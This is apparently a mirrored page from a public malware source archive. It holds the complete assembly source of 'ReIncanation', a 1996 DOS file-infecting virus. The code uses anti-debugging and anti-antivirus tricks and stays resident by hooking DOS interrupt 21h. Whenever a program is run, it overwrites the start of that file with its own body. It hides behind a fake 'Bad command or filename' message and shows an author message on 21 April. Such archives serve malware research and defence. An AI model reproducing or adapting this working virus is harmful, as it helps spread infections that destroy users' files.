mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 18:36:10 +00:00
148 lines
5.8 KiB
NASM
148 lines
5.8 KiB
NASM
|
start:
|
||
|
and al,21h
|
||
|
|
||
|
;anti_disassembler & anti_debugger
|
||
|
mov cx,09ebh
|
||
|
mov ax,0fe05h
|
||
|
jmp $-2
|
||
|
add ah,03bh
|
||
|
jmp $-10
|
||
|
|
||
|
;anti_debugger
|
||
|
mov ax,3503h ;save int 3h in bx
|
||
|
int 21h ;do it
|
||
|
mov ah,25h ;set new int 3h...
|
||
|
mov dx,offset new_int_3 ;...to new_int_3
|
||
|
int 21h ;do it
|
||
|
xchg bx,dx ;exchange bx,dx (restore original int 3h)
|
||
|
int 21h ;do it
|
||
|
|
||
|
|
||
|
;anti_vsafe
|
||
|
mov ax,0f9f2h
|
||
|
add ax,10h
|
||
|
mov dx,5935h
|
||
|
add dx,10h
|
||
|
mov bl,10h
|
||
|
sub bl,10h
|
||
|
int 16h
|
||
|
|
||
|
|
||
|
mov ah,9h ;write string
|
||
|
mov dx,offset file_not_found ;Befehl oder Dateiname nicht gefunden.
|
||
|
int 21h ;do it
|
||
|
|
||
|
|
||
|
mov ax,9999h ;put 9999h in ax (for resident test)
|
||
|
int 21h ;do it
|
||
|
|
||
|
cmp bx,9999h ;compare bx,9999h
|
||
|
je already_there ;if bx=9999h, we are already resident and goto already_there
|
||
|
jmp makemegotsr ;else goto makemegotsr
|
||
|
|
||
|
already_there: ;already resident
|
||
|
int 20h ;exit
|
||
|
|
||
|
|
||
|
makemegotsr:
|
||
|
mov ax,3521h ; get int 21h
|
||
|
int 21h ;do it
|
||
|
mov word ptr cs:old21,bx ; save old int 21h
|
||
|
mov word ptr cs:old21+2,es ;... save
|
||
|
mov dx,offset new21 ; new int 21 comes to offset new21
|
||
|
mov ax,2521h ; set new int 21h
|
||
|
int 21h ; do it
|
||
|
push cs ; push it
|
||
|
pop ds ; pop it
|
||
|
mov dx,offset endvir ; put everything of us in memory
|
||
|
int 27h ; do it
|
||
|
|
||
|
|
||
|
new21: pushf ;new int 21
|
||
|
cmp ax,9999h ;resident test ???
|
||
|
jnz no_installation_check ;if no test goto no_install_check
|
||
|
xchg ax,bx ;if resident test, put 9999h in bx
|
||
|
no_installation_check: ;no_install_check
|
||
|
cmp ax,4b00h ;is there something executed?
|
||
|
jz infect ;yes, goto infect
|
||
|
jmp short end21 ;no, jmp to normal old int 21h
|
||
|
|
||
|
infect: ;infect the executed file
|
||
|
mov ax,4301h ;set attributes
|
||
|
xor cx,cx ;to 0
|
||
|
int 21h ;do it
|
||
|
|
||
|
mov ax,3d02h ;open file
|
||
|
int 21h ;do it
|
||
|
mov bx,ax ;put ax in bx, or.. xchg ax,bx.. but that doesn't work here
|
||
|
push ax ;push all
|
||
|
push bx
|
||
|
push cx
|
||
|
push dx
|
||
|
push ds
|
||
|
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov ax,4200h ;seek
|
||
|
xor cx,cx ;at beginning of tha file
|
||
|
cwd
|
||
|
int 21h ;do it
|
||
|
|
||
|
mov cx,offset endvir-offset start ;how much bytes to write
|
||
|
mov ah,40h ;write
|
||
|
mov dx,offset start ;from offset start
|
||
|
int 21h ;do it
|
||
|
|
||
|
cwd ; set date/time
|
||
|
xor cx,cx ; to zero
|
||
|
mov ax,5701h ;function for date/time
|
||
|
int 21h ;do it
|
||
|
|
||
|
mov ah,3eh ; close file
|
||
|
int 21h ;do it
|
||
|
|
||
|
mov ah,2ah ;get date
|
||
|
int 21h ;do it
|
||
|
cmp dh,4 ;compare month(dh) with 4
|
||
|
jne not_my_birthday ;not the 4th month, goto not_my_birthday
|
||
|
monat_ok:cmp dl,21 ;else compare day(dl) with 21
|
||
|
jne not_my_birthday ;not the 21th, goto not_my_birthday
|
||
|
tag_ok:mov ah,9h ;if it is the 21.April write message
|
||
|
mov dx,offset text ;of offset text
|
||
|
int 21h ;do it
|
||
|
mov ah,00h ;wait until keypressed
|
||
|
int 16h ;do it
|
||
|
jmp restore ;goto restore (tha registers)
|
||
|
|
||
|
not_my_birthday: ;if it is not_my_birthday
|
||
|
mov ah,9h ;write message
|
||
|
mov dx,offset file_not_found ;Befehl oder Dateiname nicht gefunden. (English: Bad command or filename.)
|
||
|
int 21h ;do it
|
||
|
|
||
|
|
||
|
restore:
|
||
|
pop ds ; pop all
|
||
|
pop dx
|
||
|
pop cx
|
||
|
pop bx
|
||
|
pop ax
|
||
|
|
||
|
end21: popf ; pop far
|
||
|
db 0eah ; jmp far (?)
|
||
|
|
||
|
old21 dw 0,0 ; where to store the old INT21
|
||
|
text: db'ReIncanation written by Spooky. Austria 1996',0dh,0ah,'$' ;message for debugger or date 21.April
|
||
|
file_not_found: db'Befehl oder Dateiname nicht gefunden.',0dh,0ah,'$' ;message file not found
|
||
|
new_int_3: ;new interrupt 3h for the debugger
|
||
|
mov ah,9h ;write string to standard output
|
||
|
mov dx,offset text ;text to write
|
||
|
int 21h ;do it
|
||
|
mov ah,00h ;wait until keypressed
|
||
|
int 16h ;do it
|
||
|
int 20h ;-> terminate debugging
|
||
|
|
||
|
|
||
|
endvir label byte ; End of file
|
||
|
|
||
|
end start
|